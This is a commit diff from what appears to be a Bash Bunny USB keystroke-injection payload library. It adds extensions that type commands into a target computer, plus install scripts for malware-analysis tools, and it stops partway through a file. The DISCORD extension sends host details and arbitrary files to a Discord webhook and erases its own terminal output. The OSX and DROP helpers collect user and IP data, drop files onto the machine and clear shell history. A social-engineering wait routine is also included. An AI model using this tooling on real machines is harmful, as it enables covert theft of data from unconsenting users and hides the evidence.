Compare commits
38 Commits
863dc1f587
...
ab46e5062c
Author | SHA1 | Date |
---|---|---|
Aleff | ab46e5062c | |
Peaks | 9bc2a0312d | |
Rafa Guillermo | f7cf46fd95 | |
Rafa Guillermo | 774cc77212 | |
Rafa Guillermo | 5da19abe97 | |
Rafa Guillermo | b1cf7e8ef4 | |
Rafa Guillermo | 9bcb7f9240 | |
Rafa Guillermo | bf149a783b | |
Rafa Guillermo | bc36c76444 | |
Rafa Guillermo | 6a260cfd4b | |
Peaks | 8d901a02a8 | |
Peaks | 14fa7c490e | |
Peaks | 2559d728b1 | |
Peaks | 257081013d | |
Peaks | e6c3876429 | |
Peaks | 0e51172697 | |
Quentin Lamamy | 5ce34d6819 | |
Quentin Lamamy | a57046358b | |
Aleff | 463acb8559 | |
Aleff | fd03dfda79 | |
Aleff | 40e28fac9b | |
Aleff | 9892715933 | |
aleff-github | bc056509f0 | |
Aleff | 59d534c24c | |
quentinlamamy | 5cfae30936 | |
quentinlamamy | 971a981c9f | |
TheDragonkeeper | 963c000ab9 | |
Zappus | 4731402ad9 | |
bg-wa | a479964196 | |
bg-wa | 17e0b3d50c | |
GermanNoob | 18e36a88b0 | |
bg-wa | 5f06649cd2 | |
bg-wa | 9ab8820cc5 | |
bg-wa | b3b9f75200 | |
bg-wa | 5c764849f3 | |
bg-wa | afdafb27d6 | |
bg-wa | 821105a6a3 | |
bg-wa | 31ae33e78a |
|
@ -0,0 +1,86 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Discord Extension
|
||||||
|
# Description: Interact with discord webhook to exfiltrate text or files
|
||||||
|
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Extension
|
||||||
|
#
|
||||||
|
# To use this extension, you need to create a webhook on discord and get the webhook id and token
|
||||||
|
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
|
||||||
|
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
|
||||||
|
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
|
||||||
|
|
||||||
|
function DISCORD() {
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
|
||||||
|
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
|
||||||
|
# @usage DISCORD INIT
|
||||||
|
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
|
||||||
|
"INIT")
|
||||||
|
|
||||||
|
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
|
||||||
|
curl_header="Content-Type: application/json"
|
||||||
|
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location '$curl_location'"
|
||||||
|
Q STRING " --header '$curl_header'"
|
||||||
|
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_OS}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_IP_V4}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_IP_V6}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_USER}'"
|
||||||
|
Q STRING "\",\"inline\":true}]"
|
||||||
|
Q STRING "}]}'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SEND")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Send a message to discord via webhook
|
||||||
|
# @usage DISCORD SEND MSG $yourMessage
|
||||||
|
"MSG")
|
||||||
|
|
||||||
|
if [[ "$3" == *"$"* ]]; then
|
||||||
|
message="'$3'"
|
||||||
|
else
|
||||||
|
message=$3
|
||||||
|
fi
|
||||||
|
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Send a file to discord via webhook
|
||||||
|
# @usage DISCORD SEND FILE $yourFilePath
|
||||||
|
"FILE")
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DISCORD
|
|
@ -0,0 +1,103 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# DROP v1 by bg-wa
|
||||||
|
# Simplifies dropping files from HID attacks for LINUX
|
||||||
|
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||||
|
#
|
||||||
|
# Example:
|
||||||
|
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||||
|
source ./run.sh
|
||||||
|
|
||||||
|
function DROP() {
|
||||||
|
os=$1
|
||||||
|
source=$2
|
||||||
|
destination=$3
|
||||||
|
overwrite=$4
|
||||||
|
executable=$5
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
RUN WIN powershell
|
||||||
|
;;
|
||||||
|
OSX)
|
||||||
|
RUN OSX terminal
|
||||||
|
;;
|
||||||
|
UNITY)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
LINUX)
|
||||||
|
RUN LINUX terminal
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
|
||||||
|
if "$overwrite" == "true"
|
||||||
|
then
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING del "$destination"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING rm "$destination"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING fsutil file createnew "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING notepad.exe "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING vi "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING i
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
while IFS= read -r data
|
||||||
|
do
|
||||||
|
QUACK STRING "$data"
|
||||||
|
QUACK ENTER
|
||||||
|
done < "$source"
|
||||||
|
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK CTRL s
|
||||||
|
QUACK CRTL x
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK ESC
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING :wq
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
if "$executable" == "true"
|
||||||
|
then
|
||||||
|
QUACK STRING chmod +x "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK STRING history -c
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DROP
|
|
@ -0,0 +1,278 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: OSX Extension
|
||||||
|
# Description: Allow a bunch of osx interaction
|
||||||
|
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 2.0
|
||||||
|
# Category: Extension
|
||||||
|
|
||||||
|
function OSX() {
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
|
||||||
|
"TERMINAL")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Open a terminal
|
||||||
|
# @usage OSX TERMINAL OPEN
|
||||||
|
"OPEN")
|
||||||
|
Q GUI SPACE
|
||||||
|
Q STRING terminal
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Initialize the terminal
|
||||||
|
# Make the PS1 nicer (just because I like it)
|
||||||
|
# Grab Host information and store it in BB_OSX vars
|
||||||
|
# @usage OSX TERMINAL INIT
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"INIT")
|
||||||
|
|
||||||
|
Q STRING "bash"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "clear"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'BB_HOST_USER=$(whoami)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_NAME=$(hostname)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING "BB_HOST_OS='OSX'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Minimize the terminal
|
||||||
|
# @usage OSX TERMINAL MINIMIZE
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"MINIMIZE")
|
||||||
|
Q STRING 'printf \e[2t'
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Resize the focused terminal
|
||||||
|
# @usage OSX TERMINAL RESIZE $width $height
|
||||||
|
# @param <integer> $width The terminal width
|
||||||
|
# @param <integer> $height The terminal height
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"RESIZE")
|
||||||
|
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Clear the focused terminal
|
||||||
|
# @usage OSX TERMINAL ZOOM
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"CLEAR")
|
||||||
|
Q STRING clear
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Close all terminal
|
||||||
|
# @usage OSX TERMINAL CLOSE
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"CLOSE")
|
||||||
|
Q STRING history -c
|
||||||
|
Q ENTER
|
||||||
|
Q STRING killall Terminal
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change terminal window name
|
||||||
|
# @usage OSX TERMINAL NAME <WINDOW_NAME>
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"NAME")
|
||||||
|
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"NETWORK")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"WIFI")
|
||||||
|
|
||||||
|
case $3 in
|
||||||
|
|
||||||
|
# @desc Enable wifi
|
||||||
|
# @usage OSX NETWORK WIFI ENABLE
|
||||||
|
"ENABLE")
|
||||||
|
Q STRING "networksetup -setairportpower en0 on"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Disable wifi
|
||||||
|
# @usage OSX NETWORK WIFI DISABLE
|
||||||
|
"DISABLE")
|
||||||
|
Q STRING "networksetup -setairportpower en0 off"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Connect to a wifi network
|
||||||
|
# @usage OSX NETWORK CONNECT $ssid $password
|
||||||
|
# @arg <string> Wifi SSID
|
||||||
|
# @arg <string> Wifi Password
|
||||||
|
"CONNECT")
|
||||||
|
Q STRING "networksetup -setairportnetwork en0 $4 $5"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"ETHERNET")
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SESSION")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Shutdown the computer
|
||||||
|
# @usage OSX SESSION SHUTDOWN
|
||||||
|
"SHUTDOWN")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Restart the computer
|
||||||
|
# @usage OSX SESSION RESTART
|
||||||
|
"RESTART")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Lock the computer
|
||||||
|
# @usage OSX SESSION LOCK
|
||||||
|
"LOCK")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Logout current session
|
||||||
|
# @usage OSX SESSION LOGOUT
|
||||||
|
"LOGOUT")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
"GET_USER")
|
||||||
|
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
|
||||||
|
Q STRING 'BB_OSX_USER=$(whoami)'
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SOUND")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"PLAY")
|
||||||
|
Q STRING "afplay $3"
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change the computer volume
|
||||||
|
# @usage OSX MISC VOLUME $volumeValue
|
||||||
|
# @arg <integer> An integer between 0 and 10
|
||||||
|
"VOLUME")
|
||||||
|
Q STRING "osascript -e 'set Volume $3'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
;;
|
||||||
|
|
||||||
|
"NOTIFICATION")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"CLEAR")
|
||||||
|
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
"DISPLAY")
|
||||||
|
|
||||||
|
if [ -z $6]; then
|
||||||
|
$6=${1:-"Purr"}
|
||||||
|
fi
|
||||||
|
|
||||||
|
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"MISC")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Show or hide desktop icon
|
||||||
|
# @usage OSX MISC DESKTOP_ICON $action
|
||||||
|
# @arg <string> HIDE | void
|
||||||
|
"DESKTOP_ICON")
|
||||||
|
if [ $3 == "HIDE" ]; then
|
||||||
|
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
|
||||||
|
Q ENTER
|
||||||
|
else
|
||||||
|
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
|
||||||
|
Q ENTER
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change wallpaper with the specified url image
|
||||||
|
# @usage OSX MISC WALLPAPER_URL
|
||||||
|
"WALLPAPER_URL")
|
||||||
|
Q STRING "cd ~/Desktop"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl $3 > img.bb"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Say something in the way of bigben
|
||||||
|
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
|
||||||
|
# @info Need a focused terminal
|
||||||
|
"SAY")
|
||||||
|
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f OSX
|
|
@ -0,0 +1,126 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Quickly get to a prompt on any platform with the BashBunny
|
||||||
|
#
|
||||||
|
# How this works?
|
||||||
|
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||||
|
# with:
|
||||||
|
# PROMPT [OS]
|
||||||
|
# 2) OS options are:
|
||||||
|
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||||
|
# "UNITY" : Launches Terminal in Unity
|
||||||
|
# "UNITY_RUN" : Opens run prompt in Unity
|
||||||
|
# "MAC" : Launches Terminal in OSX
|
||||||
|
# "POWERSHELL" : Launches Powershell in Windows
|
||||||
|
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||||
|
# 3) To close a prompt use:
|
||||||
|
# CLOSE_PROMPT [OS]
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Start HID Prompt
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
function PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
OS="AUTO"
|
||||||
|
else
|
||||||
|
OS=$1
|
||||||
|
fi
|
||||||
|
|
||||||
|
#AUTO
|
||||||
|
if [ "${OS}" = "AUTO" ]; then
|
||||||
|
LED G B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI r
|
||||||
|
clear_active_input
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY
|
||||||
|
if [ "${OS}" = "UNITY" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK GUI
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY_RUN
|
||||||
|
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
fi
|
||||||
|
|
||||||
|
#MAC
|
||||||
|
if [ "${OS}" = "MAC" ]; then
|
||||||
|
LED R B G 100
|
||||||
|
QUACK GUI SPACE
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#POWERSHELL
|
||||||
|
if [ "${OS}" = "POWERSHELL" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK powershell
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#WINDOWS_RUN
|
||||||
|
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED 0
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function CLOSE_PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
QUACK ALT F4
|
||||||
|
else
|
||||||
|
if [ "$1" = "MAC" ]; then
|
||||||
|
QUACK GUI w
|
||||||
|
else
|
||||||
|
QUACK ALT F4
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# HELPER FUNCTIONS
|
||||||
|
function wait_enter_wait() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
BEFORE_WAIT=100
|
||||||
|
else
|
||||||
|
BEFORE_WAIT=$1
|
||||||
|
fi
|
||||||
|
if [ -z "$2" ]; then
|
||||||
|
AFTER_WAIT=100
|
||||||
|
else
|
||||||
|
AFTER_WAIT=$2
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY ${BEFORE_WAIT}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY ${AFTER_WAIT}
|
||||||
|
}
|
||||||
|
|
||||||
|
function clear_active_input() {
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK BACKSPACE
|
||||||
|
QUACK DELAY 100
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f PROMPT
|
||||||
|
export -f CLOSE_PROMPT
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Social engineering wait by GermanNoob
|
||||||
|
#
|
||||||
|
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
|
||||||
|
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
|
||||||
|
#
|
||||||
|
# This is just a small extension to DarrenKitchen's WAIT
|
||||||
|
|
||||||
|
function SEWAIT() {
|
||||||
|
LED SPECIAL
|
||||||
|
ATTACKMODE STORAGE
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
TEST=$SWITCH_POSITION
|
||||||
|
LED SPECIAL2
|
||||||
|
while true
|
||||||
|
do GET SWITCH_POSITION
|
||||||
|
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||||
|
sleep 1
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f SEWAIT
|
|
@ -0,0 +1,36 @@
|
||||||
|
# Malware Bunny
|
||||||
|
## Overview
|
||||||
|
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
|
||||||
|
|
||||||
|
|
||||||
|
2 Operation Modes
|
||||||
|
* Web UI for quick access to samples
|
||||||
|
* SSH access for analysis sessions
|
||||||
|
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
1. Get Bunny to access the Internet
|
||||||
|
2. Install all tools and components
|
||||||
|
* or - run setup.sh to install everything
|
||||||
|
* or - manually install every tool from setup scripts
|
||||||
|
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
|
||||||
|
4. Boot Bunny in switch1 mode to access web interface
|
||||||
|
5. Boot Bunny in switch2 mode to access ssh interface
|
||||||
|
|
||||||
|
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
|
||||||
|
|
||||||
|
|
||||||
|
## Software Installed
|
||||||
|
1. viper v1.2
|
||||||
|
2. ssdeep v2.14.1
|
||||||
|
3. yara v3.7.0
|
||||||
|
4. pyew
|
||||||
|
6. featherduster
|
||||||
|
7. capstone
|
||||||
|
8. binwalk
|
||||||
|
9. dshell
|
||||||
|
10. wabt
|
||||||
|
11. peepdf
|
||||||
|
12. unzip
|
||||||
|
13. punbup
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: binwalk install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
|
||||||
|
pip install cstruct
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone https://github.com/ReFirmLabs/binwalk
|
||||||
|
cd binwalk
|
||||||
|
|
||||||
|
|
||||||
|
git clone https://github.com/devttys0/sasquatch
|
||||||
|
cd sasquatch/
|
||||||
|
ls
|
||||||
|
# edit build file to fix lack of sudo error on make install
|
||||||
|
# vi build.sh
|
||||||
|
./build.sh
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/sviehb/jefferson
|
||||||
|
cd jefferson
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/jrspruitt/ubi_reader
|
||||||
|
cd ubi_reader
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/devttys0/yaffshiv
|
||||||
|
cd yaffshiv
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
|
||||||
|
cp bin/unstuff /usr/local/bin/
|
||||||
|
|
||||||
|
python setup.py install
|
|
@ -0,0 +1,21 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: capstone install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp/
|
||||||
|
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
|
||||||
|
tar xf 3.0.5-rc2.tar.gz
|
||||||
|
rm 3.0.5-rc2.tar.gz
|
||||||
|
mv capstone-3.0.5-rc2/ /tools/capstone
|
||||||
|
|
||||||
|
cd /tools/capstone
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
cd bindings/python
|
||||||
|
make install
|
|
@ -0,0 +1,29 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: dshell install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y python-dpkt python-ipy python-pypcap
|
||||||
|
pip install pygeoip
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone https://github.com/USArmyResearchLab/Dshell dshell
|
||||||
|
cd dshell
|
||||||
|
|
||||||
|
cd share/GeoIP/
|
||||||
|
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
|
||||||
|
gunzip -d GeoIP.dat.gz
|
||||||
|
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
|
||||||
|
gunzip -d GeoIPv6.dat.gz
|
||||||
|
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
|
||||||
|
gunzip -d GeoIPASNum.dat.gz
|
||||||
|
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
|
||||||
|
gunzip -d GeoIPASNumv6.dat.gz
|
||||||
|
cd ../../
|
||||||
|
|
||||||
|
make
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: featherduster install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
apt-get install -y libgmp3-dev
|
||||||
|
apt-get install -y libncurses-dev
|
||||||
|
|
||||||
|
cd /tools
|
||||||
|
git clone https://github.com/nccgroup/featherduster
|
||||||
|
cd featherduster
|
||||||
|
|
||||||
|
python setup.py install
|
|
@ -0,0 +1,33 @@
|
||||||
|
#!/bin/bash
|
||||||
|
